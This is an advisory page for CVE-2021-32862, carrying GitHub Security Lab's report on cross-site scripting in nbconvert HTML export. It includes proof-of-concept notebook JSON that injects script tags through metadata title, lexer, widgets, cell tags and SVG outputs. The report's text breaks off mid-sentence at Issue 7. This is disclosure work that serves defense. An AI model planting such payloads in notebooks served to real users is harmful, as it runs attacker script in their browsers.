logo

Advisories

Weaknesses

Fixes

Requirements

Compliance

CVE-2021-32862 nbconvert

Package

Manager: pip
Name: nbconvert
Vulnerable Version: >=0 <6.5.1

Severity

Level: Medium

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N

EPSS: 0.00699 pctl0.71082

Details

nbconvert vulnerable to cross-site scripting (XSS) via multiple exploit paths Most of the fixes will be in this repo, though, so having it here gives us the private fork to work on patches Below is currently a duplicate of the original report: ---- Received on security@ipython.org unedited, I'm not sure if we want to make it separate advisories. Pasted raw for now, feel free to edit or make separate advisories if you have the rights to. I think the most important is to switch back from nbviewer.jupyter.org -> nbviewer.org at the cloudflare level I guess ? There might be fastly involved as well. --- ### Impact _What kind of vulnerability is it? Who is impacted?_ ### Patches _Has the problem been patched? What versions should users upgrade to?_ ### Workarounds _Is there a way for users to fix or remediate the vulnerability without upgrading?_ ### References _Are there any links users can visit to find out more?_ ### For more information If you have any questions or comments about this advisory: * Open an issue in [example link to repo](http://example.com) * Email us at [example email address](mailto:example@example.com) --- # GitHub Security Lab (GHSL) Vulnerability Report The [GitHub Security Lab](https://securitylab.github.com) team has identified potential security vulnerabilities in [nbconvert](https://github.com/jupyter/nbconvert). We are committed to working with you to help resolve these issues. In this report you will find everything you need to effectively coordinate a resolution of these issues with the GHSL team. If at any point you have concerns or questions about this process, please do not hesitate to reach out to us at `securitylab@github.com` (please include `GHSL-2021-1013`, `GHSL-2021-1014`, `GHSL-2021-1015`, `GHSL-2021-1016`, `GHSL-2021-1017`, `GHSL-2021-1018`, `GHSL-2021-1019`, `GHSL-2021-1020`, `GHSL-2021-1021`, `GHSL-2021-1022`, `GHSL-2021-1023`, `GHSL-2021-1024`, `GHSL-2021-1025`, `GHSL-2021-1026`, `GHSL-2021-1027` or `GHSL-2021-1028` as a reference). If you are _NOT_ the correct point of contact for this report, please let us know! ## Summary When using nbconvert to generate an HTML version of a user-controllable notebook, it is possible to inject arbitrary HTML which may lead to Cross-Site Scripting (XSS) vulnerabilities if these HTML notebooks are served by a web server (eg: nbviewer) ## Product nbconvert ## Tested Version [v5.5.0](https://github.com/jupyter/nbconvert/releases/tag/5.5.0) ## Details ### Issue 1: XSS in notebook.metadata.language_info.pygments_lexer (`GHSL-2021-1013`) Attacker in control of a notebook can inject arbitrary unescaped HTML in the `notebook.metadata.language_info.pygments_lexer` field such as the following: ```json "metadata": { "language_info": { "pygments_lexer": "ipython3-foo\"><script>alert(1)</script>" } } ``` This node is read in the [`from_notebook_node`](https://github.com/jupyter/nbconvert/blob/3c0f82d1acbcf2264ae0fa892141a037563aabd0/nbconvert/exporters/html.py#L135-L140) method: ```python def from_notebook_node(self, nb, resources=None, **kw): langinfo = nb.metadata.get('language_info', {}) lexer = langinfo.get('pygments_lexer', langinfo.get('name', None)) highlight_code = self.filters.get('highlight_code', Highlight2HTML(pygments_lexer=lexer, parent=self)) self.register_filter('highlight_code', highlight_code) return super().from_notebook_node(nb, resources, **kw) ``` It is then assigned to `language` var and passed down to [`_pygments_highlight`](https://github.com/jupyter/nbconvert/blob/3c0f82d1acbcf2264ae0fa892141a037563aabd0/nbconvert/filters/highlight.py#L90) ```python from pygments.formatters import LatexFormatter if not language: language=self.pygments_lexer latex = _pygments_highlight(source, LatexFormatter(), language, metadata) ``` In this method, the `language` variable is [concatenated to `highlight hl-` string to conform the `cssclass`](https://github.com/jupyter/nbconvert/blob/3c0f82d1acbcf2264ae0fa892141a037563aabd0/nbconvert/filters/highlight.py#L56) passed to the `HTMLFormatter` constructor: ``` python return _pygments_highlight(source if len(source) > 0 else ' ', # needed to help post processors: HtmlFormatter(cssclass=" highlight hl-"+language), language, metadata) ``` The `cssclass` variable is then [concatenated in the outer div class attribute](https://github.com/pygments/pygments/blob/30cfa26201a27dee1f8e6b0d600cad1138e64507/pygments/formatters/html.py#L791) ``` python yield 0, ('<div' + (self.cssclass and ' class="%s"' % self.cssclass) + (style and (' style="%s"' % style)) + '>') ``` Note that the `cssclass` variable is also used in other unsafe places such as [`'<table class="%stable">' % self.cssclass + filename_tr +`](https://github.com/pygments/pygments/blob/30cfa26201a27dee1f8e6b0d600cad1138e64507/pygments/formatters/html.py#L711)) ### Issue 2: XSS in notebook.metadata.title (`GHSL-2021-1014`) The `notebook.metadata.title` node is rendered directly to the [`index.html.j2`](https://github.com/jupyter/nbconvert/blob/3c0f82d1acbcf2264ae0fa892141a037563aabd0/share/jupyter/nbconvert/templates/lab/index.html.j2#L12-L13) HTML template with no escaping: ```html {% set nb_title = nb.metadata.get('title', '') or resources['metadata']['name'] %} <title>{{nb_title}}</title> ``` The following `notebook.metadata.title` node will execute arbitrary javascript: ```json "metadata": { "title": "TITLE</title><script>alert(1)</script>" } ``` Note: this issue also affect other templates, not just the `lab` one. ### Issue 3: XSS in notebook.metadata.widgets(`GHSL-2021-1015`) The `notebook.metadata.widgets` node is rendered directly to the [`base.html.j2`](https://github.com/jupyter/nbconvert/blob/3c0f82d1acbcf2264ae0fa892141a037563aabd0/share/jupyter/nbconvert/templates/lab/index.html.j2#L12-L13) HTML template with no escaping: ```html {% set mimetype = 'application/vnd.jupyter.widget-state+json'%} {% if mimetype in nb.metadata.get("widgets",{})%} <script type="{{ mimetype }}"> {{ nb.metadata.widgets[mimetype] | json_dumps }} </script> {% endif %} ``` The following `notebook.metadata.widgets` node will execute arbitrary javascript: ```json "metadata": { "widgets": { "application/vnd.jupyter.widget-state+json": {"foo": "pwntester</script><script>alert(1);//"} } } ``` Note: this issue also affect other templates, not just the `lab` one. ### Issue 4: XSS in notebook.cell.metadata.tags(`GHSL-2021-1016`) The `notebook.cell.metadata.tags` nodes are output directly to the [`celltags.j2`](https://github.com/jupyter/nbconvert/blob/3c0f82d1acbcf2264ae0fa892141a037563aabd0/share/jupyter/nbconvert/templates/base/celltags.j2#L4) HTML template with no escaping: ``` {%- macro celltags(cell) -%} {% if cell.metadata.tags | length > 0 -%} {% for tag in cell.metadata.tags -%} {{ ' celltag_' ~ tag -}} {%- endfor -%} {%- endif %} {%- endmacro %} ``` The following `notebook.cell.metadata.tags` node will execute arbitrary javascript: ```json { "cell_type": "code", "execution_count": null, "id": "727d1a5f", "metadata": { "tags": ["FOO\"><script>alert(1)</script><div \""] }, "outputs": [], "source": [] } ], ``` Note: this issue also affect other templates, not just the `lab` one. ### Issue 5: XSS in output data text/html cells(`GHSL-2021-1017`) Using the `text/html` output data mime type allows arbitrary javascript to be executed when rendering an HTML notebook. This is probably by design, however, it would be nice to enable an option which uses an HTML sanitizer preprocessor to strip down all javascript elements: The following is an example of a cell with `text/html` output executing arbitrary javascript code: ```json { "cell_type": "code", "execution_count": 5, "id": "b72e53fa", "metadata": {}, "outputs": [ { "data": { "text/html": [ "<script>alert(1)</script>" ] }, "execution_count": 5, "metadata": {}, "output_type": "execute_result" } ], "source": [ "import os; os.system('touch /tmp/pwned')" ] }, ``` ### Issue 6: XSS in output data image/svg+xml cells(`GHSL-2021-1018`) Using the `image/svg+xml` output data mime type allows arbitrary javascript to be executed when rendering an HTML notebook. The `cell.output.data["image/svg+xml"]` nodes are rendered directly to the [`base.html.j2`](https://github.com/jupyter/nbconvert/blob/main/share/jupyter/nbconvert/templates/classic/base.html.j2) HTML template with no escaping ``` {%- else %} {{ output.data['image/svg+xml'] }} {%- endif %} ``` The following `cell.output.data["image/svg+xml"]` node will execute arbitrary javascript: ```json { "output_type": "execute_result", "data": { "image/svg+xml": ["<script>console.log(\"image/svg+xml output\")</script>"] }, "execution_count": null, "metadata": { } } ``` ### Issue 7: XSS in notebook.cell.output.svg_filename(`GHSL-2021-1019`) The `cell.output.svg_filename` nodes are rendered directly to the [`base.html.j2`](https://github.com/jupyter/nbconvert/blob/main/share/jupyter/nbconvert/templates/classic/base.html.j2) HTML template with no escaping ``` {%- if output.svg_filename %} <img src="{{ output.svg_filename | posix_path }}"> ``` The following `cell.output.svg_filename` node will

Metadata

Created: 2022-08-10T17:51:53Z
Modified: 2024-01-25T22:10:32Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/08/GHSA-9jmq-rx5f-8jwq/GHSA-9jmq-rx5f-8jwq.json
CWE IDs: ["CWE-79"]
Alternative ID: GHSA-9jmq-rx5f-8jwq
Finding: F008
Auto approve: 1